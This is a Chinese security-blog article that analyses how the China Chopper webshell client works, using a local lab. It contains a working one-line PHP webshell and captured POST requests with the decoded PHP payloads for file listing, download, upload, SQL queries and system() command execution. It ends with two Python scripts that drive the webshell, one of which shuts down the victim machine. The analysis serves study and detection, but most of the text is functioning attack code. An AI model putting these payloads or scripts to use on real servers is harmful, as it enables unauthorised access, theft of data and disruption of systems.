强大的利器-菜刀工作原理分析

  • A+
所属分类:逆向工程

环境:
1. xp1:192.168.110.132(受害机)
PHPnow 1.5.6
Wireshark1.12.0
2. xp2:192.168.110.129(攻击机)
中国菜刀20100812
3. Kali:192.168.110.128
Python 2.7.3


过程:
首先,我们在xp1中的web目录下写入一句话<?php eval($_POST[‘wood’]);?>,保存为1.php。
然后我们用菜刀连接上,并配置好数据库管理信息。
0x01目录管理
我们在xp1抓包获取如下信息:

  1. POST /1.php HTTP/1.1

  2. X-Forwarded-For: 199.1.88.29

  3. Referer: http://192.168.110.132

  4. Content-Type: application/x-www-form-urlencoded

  5. User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0

  6. Host: 192.168.110.132

  7. Content-Length: 744

  8. Cache-Control: no-cache

  9. [email protected](base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JEY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiIvIi4kTjskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiLkBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUjt9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7&z1=QzpcXFBIUG5vdy0xLjUuNi40MjM3NDkzNzM2XFxodGRvY3NcXA%3D%3D

很明显是经过url编码,和base64编码,我们对其进行解码得到如下信息:

  1. [email protected](base64_decode($_POST[z0]));

  2. &[email protected]_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;//关闭错误信息显示,关闭执行时间限制,关闭魔术引号

  3. $D=base64_decode($_POST["z1"]);

  4. [email protected]($D);

  5. if($F==NULL)

  6. {

  7. echo("ERROR:// Path Not Found Or No Permission!");

  8. }

  9. else

  10. {

  11. $M=NULL;$L=NULL;

  12. while([email protected]($F))

  13. {

  14. $P=$D."/".$N;

  15. [email protected]("Y-m-d H:i:s",@filemtime($P));

  16. @$E=substr(base_convert(@fileperms($P),10,8),-4);

  17. $R="t".$T."t"[email protected]($P)."t".$E."";

  18. if(@is_dir($P))

  19. $M.=$N."/".$R;

  20. else

  21. $L.=$N.$R;

  22. }

  23. echo $M.$L;

  24. @closedir($F);

  25. };

  26. echo("|<-");

  27. die();

  28. &z1=C:\PHPnow-1.5.6.4237493736\htdocs\

0x02下载文件
我们从xp1上下载1.txt,其内容为test。
抓包信息:

  1. POST /1.php HTTP/1.1

  2. Content-Type: application/x-www-form-urlencoded

  3. Referer: http://192.168.110.132

  4. User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0

  5. Host: 192.168.110.132

  6. Content-Length: 472

  7. Cache-Control: no-cache

  8. [email protected](base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskRj1nZXRfbWFnaWNfcXVvdGVzX2dwYygpP3N0cmlwc2xhc2hlcygkX1BPU1RbInoxIl0pOiRfUE9TVFsiejEiXTskZnA9QGZvcGVuKCRGLCJyIik7aWYoQGZnZXRjKCRmcCkpe0BmY2xvc2UoJGZwKTtAcmVhZGZpbGUoJEYpO31lbHNle2VjaG8oIkVSUk9SOi8vIENhbiBOb3QgUmVhZCIpO307ZWNobygifDwtIik7ZGllKCk7&z1=C%3A%5C%5CPHPnow-1.5.6.4237493736%5C%5Chtdocs%5C%5C1.txt

同样解码后得到信息:

  1. [email protected](base64_decode($_POST[z0]));

  2. &[email protected]_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;

  3. $F=get_magic_quotes_gpc()?stripslashes($_POST["z1"]):$_POST["z1"];

  4. [email protected]($F,"r");

  5. if(@fgetc($fp))

  6. {

  7. @fclose($fp);@readfile($F);

  8. }

  9. else

  10. {

  11. echo("ERROR:// Can Not Read");

  12. };

  13. echo("|<-");die();

  14. &z1=C:\PHPnow-1.5.6.4237493736\htdocs\1.txt

0x03上传文件
我们从xp2上传一个名为1.png的图片到xp1上。。
抓包信息如下:

  1. POST /1.php HTTP/1.1

  2. Content-Type: application/x-www-form-urlencoded

  3. Referer: http://192.168.110.132

  4. User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0

  5. Host: 192.168.110.132

  6. Content-Length: 210271

  7. Cache-Control: no-cache

  8. &[email protected](base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskZj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JGM9JF9QT1NUWyJ6MiJdOyRjPXN0cl9yZXBsYWNlKCJcciIsIiIsJGMpOyRjPXN0cl9yZXBsYWNlKCJcbiIsIiIsJGMpOyRidWY9IiI7Zm9yKCRpPTA7JGk8c3RybGVuKCRjKTskaSs9MikkYnVmLj11cmxkZWNvZGUoIiUiLnN1YnN0cigkYywkaSwyKSk7ZWNobyhAZndyaXRlKGZvcGVuKCRmLCJ3IiksJGJ1Zik%2FIjEiOiIwIik7O2VjaG8oInw8LSIpO2RpZSgpOw%3D%3D&z1=QzpcXFBIUG5vdy0xLjUuNi40MjM3NDkzNzM2XFxodGRvY3NcXDEucG5n&z2=89504E470D0A1A0A0000000D49484452000000230000001E0802000000295F307D00000006624B474400FF00FF00FFA0BDA793000000097048597300000EC400000EC401952B0E1B0000010B494441544889EDD73D8A85301000E09924164230B1F2069E417B3B6FE921AC3C8057F014064104F3F70A415CF7EDEE5BF42D5B64BA8461BEFC1499A0F77E18064484B7459EE70080DEFBBAAEBDF7EF93DAB60500060094D26D4A29358EE3751511D33495521E27D971A094EAFB9E3106D7C2185396E57792738E31B66FF1F5BAD334CDF30C0094D22449E23876CE9DD2AE2E1F00B4D6555565590600EBBA364D13C7F1E7B41B24E75C14455B7544B4D63E4D23D7A5172348410A52908214A4FF28DDF0E61242B4D6CBB200C0BAAE5F353C37485114755DB7772C42889F25428831E6B712220A218E80318690F3BD7C90A4944551DCD5593E91ACB55B75CE39E7FC22B3C7E978F0CF7E000F64E0671AD7A7382D0000000049454E44AE426082


解码得:

01 &[email protected]eval(base64_decode($_POST[z0]));&[email protected]ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;
02 $f=base64_decode($_POST["z1"]);
03 $c=$_POST["z2"];


04 $c=str_replace("r","",$c);


05 $c=str_replace("n","",$c);
06 $buf="";
07 for($i=0;$i<strlen($c);$i+=2)
08 $buf.=urldecode("%".substr($c,$i,2));
09 echo(@fwrite(fopen($f,"w"),$buf)?"1":"0");;
10 echo("|<-");die();&z1=C:\PHPnow-1.5.6.4237493736\htdocs\1.png
11

&z2=89504E470D0A1A0A0000000D49484452000000230000001E0802000000295F307D00000006624B474400FF00FF00FFA0BDA793000000097048597300000EC400000EC401952B0E1B0000010B494441544889EDD73D8A85301000E09924164230B1F2069E417B3B6FE921AC3C8057F014064104F3F70A415CF7EDEE5BF42D5B64BA8461BEFC1499A0F77E18064484B7459EE70080DEFBBAAEBDF7EF93DAB60500060094D26D4A29358EE3751511D33495521E27D971A094EAFB9E3106D7C2185396E57792738E31B66FF1F5BAD334CDF30C0094D22449E23876CE9DD2AE2E1F00B4D6555565590600EBBA364D13C7F1E7B41B24E75C14455B7544B4D63E4D23D7A5172348410A52908214A4FF28DDF0E61242B4D6CBB200C0BAAE5F353C37485114755DB7772C42889F25428831E6B712220A218E80318690F3BD7C90A4944551DCD5593E91ACB55B75CE39E7FC22B3C7E978F0CF7E000F64E0671AD7A7382D0000000049454E44AE426082z2=89504E470D0A1A0A0000000D49484452000000230000001E0802000000295F307D00000006624B474400FF00FF00FFA0BDA793000000097048597300000EC400000EC401952B0E1B0000010B494441544889EDD73D8A85301000E09924164230B1F2069E417B3B6FE921AC3C8057F014064104F3F70A415CF7EDEE5BF42D5B64BA8461BEFC1499A0F77E18064484B7459EE70080DEFBBAAEBDF7EF93DAB60500060094D26D4A29358EE3751511D33495521E27D971A094EAFB9E3106D7C2185396E57792738E31B66FF1F5BAD334CDF30C0094D22449E23876CE9DD2AE2E1F00B4D6555565590600EBBA364D13C7F1E7B41B24E75C14455B7544B4D63E4D23D7A5172348410A52908214A4FF28DDF0E61242B4D6CBB200C0BAAE5F353C37485114755DB7772C42889F25428831E6B712220A218E80318690F3BD7C90A4944551DCD5593E91ACB55B75CE39E7FC22B3C7E978F0CF7E000F64E0671AD7A7382D0000000049454E44AE426082//z2为文件的16进制内容

0x04数据库管理

数据库dvwa,账号:root 密码:toor
执行:SHOW TABLES FROM `dvwa`
抓包信息:

  1. POST /1.php HTTP/1.1

  2. X-Forwarded-For: 199.1.88.29

  3. Referer: http://192.168.110.132

  4. Content-Type: application/x-www-form-urlencoded

  5. User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0

  6. Host: 192.168.110.132

  7. Content-Length: 741

  8. Cache-Control: no-cache

  9. [email protected](base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskbT1nZXRfbWFnaWNfcXVvdGVzX2dwYygpOyRoc3Q9JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejEiXSk6JF9QT1NUWyJ6MSJdOyR1c3I9JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejIiXSk6JF9QT1NUWyJ6MiJdOyRwd2Q9JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejMiXSk6JF9QT1NUWyJ6MyJdOyRkYm49JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejQiXSk6JF9QT1NUWyJ6NCJdOyRUPUBteXNxbF9jb25uZWN0KCRoc3QsJHVzciwkcHdkKTskcT1AbXlzcWxfcXVlcnkoIlNIT1cgVEFCTEVTIEZST00gYHskZGJufWAiKTt3aGlsZSgkcnM9QG15c3FsX2ZldGNoX3JvdygkcSkpe2VjaG8odHJpbSgkcnNbMF0pLmNocig5KSk7fUBteXNxbF9jbG9zZSgkVCk7O2VjaG8oInw8LSIpO2RpZSgpOw%3D%3D&z1=localhost&z2=root&z3=toor&z4=dvwa

解码:

01 [email protected]eval(base64_decode($_POST[z0]));&[email protected]ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;
02 $m=get_magic_quotes_gpc();$hst=$m?stripslashes($_POST["z1"]):$_POST["z1"];
03 $usr=$m?stripslashes($_POST["z2"]):$_POST["z2"];
04 $pwd=$m?stripslashes($_POST["z3"]):$_POST["z3"];
05 $dbn=$m?stripslashes($_POST["z4"]):$_POST["z4"];
06 $T[email protected]_connect($hst,$usr,$pwd);
07 $q[email protected]_query("SHOW TABLES FROM `{$dbn}`");
08 while($rs[email protected]_fetch_row($q))
09 {
10 echo(trim($rs[0]).chr(9));
11 }
12 @mysql_close($T);;echo("|<-");
13 die();


14 &z1=localhost&z2=root&z3=toor&z4=dvwa

执行:SELECT * FROM `users` ORDER BY 1 DESC LIMIT 0,20

POST /1.php HTTP/1.1

  1. X-Forwarded-For: 199.1.88.29

  2. Referer: http://192.168.110.132

  3. Content-Type: application/x-www-form-urlencoded

  4. User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0

  5. Host: 192.168.110.132

  6. Content-Length: 866

  7. Cache-Control: no-cache

  8. [email protected](base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskbT1nZXRfbWFnaWNfcXVvdGVzX2dwYygpOyRoc3Q9JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejEiXSk6JF9QT1NUWyJ6MSJdOyR1c3I9JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejIiXSk6JF9QT1NUWyJ6MiJdOyRwd2Q9JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejMiXSk6JF9QT1NUWyJ6MyJdOyRkYm49JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejQiXSk6JF9QT1NUWyJ6NCJdOyR0YWI9JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejUiXSk6JF9QT1NUWyJ6NSJdOyRUPUBteXNxbF9jb25uZWN0KCRoc3QsJHVzciwkcHdkKTtAbXlzcWxfc2VsZWN0X2RiKCRkYm4pOyRxPUBteXNxbF9xdWVyeSgiU0hPVyBDT0xVTU5TIEZST00gYHskdGFifWAiKTt3aGlsZSgkcnM9QG15c3FsX2ZldGNoX3JvdygkcSkpe2VjaG8odHJpbSgkcnNbMF0pLiIgKCIuJHJzWzFdLiIpIi5jaHIoOSkpO31AbXlzcWxfY2xvc2UoJFQpOztlY2hvKCJ8PC0iKTtkaWUoKTs%3D&z1=localhost&z2=root&z3=toor&z4=dvwa&z5=users

解码:

01 [email protected]eval(base64_decode($_POST[z0]));&[email protected]ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;
02 $m=get_magic_quotes_gpc();$hst=$m?stripslashes($_POST["z1"]):$_POST["z1"];
03 $usr=$m?stripslashes($_POST["z2"]):$_POST["z2"];
04 $pwd=$m?stripslashes($_POST["z3"]):$_POST["z3"];
05 $dbn=$m?stripslashes($_POST["z4"]):$_POST["z4"];
06 $tab=$m?stripslashes($_POST["z5"]):$_POST["z5"];
07 $T[email protected]_connect($hst,$usr,$pwd);
08 @mysql_select_db($dbn);$q[email protected]_query("SHOW COLUMNS FROM `{$tab}`");
09 while($rs[email protected]_fetch_row($q)){echo(trim($rs[0])." (".$rs[1].")".chr(9));}@mysql_close($T);;
10 echo("|<-");
11 die();
12 &z1=localhost&z2=root&z3=toor&z4=dvwa&z5=users

执行:SELECT `user` FROM `users` ORDER BY 1 DESC LIMIT 0,10

  1. POST /1.php HTTP/1.1

  2. X-Forwarded-For: 199.1.88.29

  3. Referer: http://192.168.110.132

  4. Content-Type: application/x-www-form-urlencoded

  5. User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0

  6. Host: 192.168.110.132

  7. Content-Length: 1027

  8. Cache-Control: no-cache

  9. [email protected](base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskbT1nZXRfbWFnaWNfcXVvdGVzX2dwYygpOyRoc3Q9JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejEiXSk6JF9QT1NUWyJ6MSJdOyR1c3I9JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejIiXSk6JF9QT1NUWyJ6MiJdOyRwd2Q9JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejMiXSk6JF9QT1NUWyJ6MyJdOyRkYm49JG0%2Fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejQiXSk6JF9QT1NUWyJ6NCJdOyRzcWw9YmFzZTY0X2RlY29kZSgkX1BPU1RbIno1Il0pOyRUPUBteXNxbF9jb25uZWN0KCRoc3QsJHVzciwkcHdkKTtAbXlzcWxfc2VsZWN0X2RiKCRkYm4pOyRxPUBteXNxbF9xdWVyeSgkc3FsKTskaT0wO3doaWxlKCRjb2w9QG15c3FsX2ZpZWxkX25hbWUoJHEsJGkpKXtlY2hvKCRjb2wuIlx0fFx0Iik7JGkrKzt9ZWNobygiXHJcbiIpO3doaWxlKCRycz1AbXlzcWxfZmV0Y2hfcm93KCRxKSl7Zm9yKCRjPTA7JGM8JGk7JGMrKyl7ZWNobyh0cmltKCRyc1skY10pKTtlY2hvKCJcdHxcdCIpO31lY2hvKCJcclxuIik7fUBteXNxbF9jbG9zZSgkVCk7O2VjaG8oInw8LSIpO2RpZSgpOw%3D%3D&z1=localhost&z2=root&z3=toor&z4=dvwa&z5=U0VMRUNUIGB1c2VyYCBGUk9NIGB1c2Vyc2AgT1JERVIgQlkgMSBERVNDIExJTUlUIDAsMTA%3D[/code="php"]解码:[email protected](base64_decode($_POST[z0]));&[email protected]_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;

  10. $m=get_magic_quotes_gpc();

  11. $hst=$m?stripslashes($_POST["z1"]):$_POST["z1"];

  12. $usr=$m?stripslashes($_POST["z2"]):$_POST["z2"];

  13. $pwd=$m?stripslashes($_POST["z3"]):$_POST["z3"];

  14. $dbn=$m?stripslashes($_POST["z4"]):$_POST["z4"];

  15. $sql=base64_decode($_POST["z5"]);

  16. [email protected]_connect($hst,$usr,$pwd);

  17. @mysql_select_db($dbn);

  18. [email protected]_query($sql);

  19. $i=0;

  20. while([email protected]_field_name($q,$i))

  21. {

  22. echo($col."t|t");

  23. $i++;

  24. }

  25. echo("rn");

  26. while([email protected]_fetch_row($q))

  27. { for($c=0;$c<$i;$c++)

  28. { echo(trim($rs[$c]));

  29. echo("t|t");

  30. }

  31. echo("rn");

  32. }

  33. @mysql_close($T);;

  34. echo("|<-");die();

  35. &z1=localhost&z2=root&z3=toor&z4=dvwa&z5=SELECT `user` FROM `users` ORDER BY 1 DESC LIMIT 0,10

0x05虚拟终端
我们在菜刀的虚拟终端中执行:whoami
抓包信息:

  1. POST /1.php HTTP/1.1

  2. X-Forwarded-For: 199.1.88.29

  3. Referer: http://192.168.110.132

  4. Content-Type: application/x-www-form-urlencoded

  5. User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0

  6. Host: 192.168.110.132

  7. Content-Length: 550

  8. Cache-Control: no-cache

  9. [email protected](base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyAneyRzfSciOiIvYyB7JHN9Ijskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIpOztlY2hvKCJ8PC0iKTtkaWUoKTs%3D&z1=Y21k&z2=Y2QgL2QgIkM6XFBIUG5vdy0xLjUuNi40MjM3NDkzNzM2XGh0ZG9jc1wiJndob2FtaSZlY2hvIFtTXSZjZCZlY2hvIFtFXQ%3D%3D

解码:

01 [email protected]eval(base64_decode($_POST[z0]));&[email protected]ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;
02 $p=base64_decode($_POST["z1"]);
03 $s=base64_decode($_POST["z2"]);
04 $d=dirname($_SERVER["SCRIPT_FILENAME"]);
05 $c=substr($d,0,1)=="/"?"-c '{$s}'":"/c {$s}";
06 $r="{$p} {$c}";
07 @system($r." 2>&1");;
08 echo("|<-");
09 die();
10 &z1=cmd&z2=cd /d "C:PHPnow-1.5.6.4237493736htdocs"&whoami&echo [S]&cd&echo [E]

分析
通过上面的信息我们可以发现,菜刀是通过发送base64编码过后的php命令来实现操作的,
那么我们自然可以去模拟菜刀的功能,下面我用2个python脚本实现。
dir.py:

01 import urllib
02 params =urllib.urlencode({"wood":"@eval(base64_decode($_POST[z0]));","z0":"QGlua
03 V9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b
04 3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7J
05 EY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPc
06 iBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkR
07 ikpeyRQPSRELiIvIi4kTjskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c
08 3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiL
09 kBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlI
10 CRMLj0kTi4kUjt9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7","z1
11 ":"QzpcXFBIUG5vdy0xLjUuNi40MjM3NDkzNzM2XFxodGRvY3NcXA=="})
12 f = urllib.urlopen("http://192.168.110.132/1.php",params)
13 print f.read()

shutdown.py:

1 import urllib
2 params = urllib.urlencode({"wood":"@eval(base64_decode($_POST[z0]));","z0":"ZWNo
3 byBgc2h1dGRvd24gLXMgLXQgMGA7"})
4 f = urllib.urlopen("http://192.168.110.132/1.php",params)
5 f.read()


本文始发于微信公众号(T00ls):强大的利器-菜刀工作原理分析

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: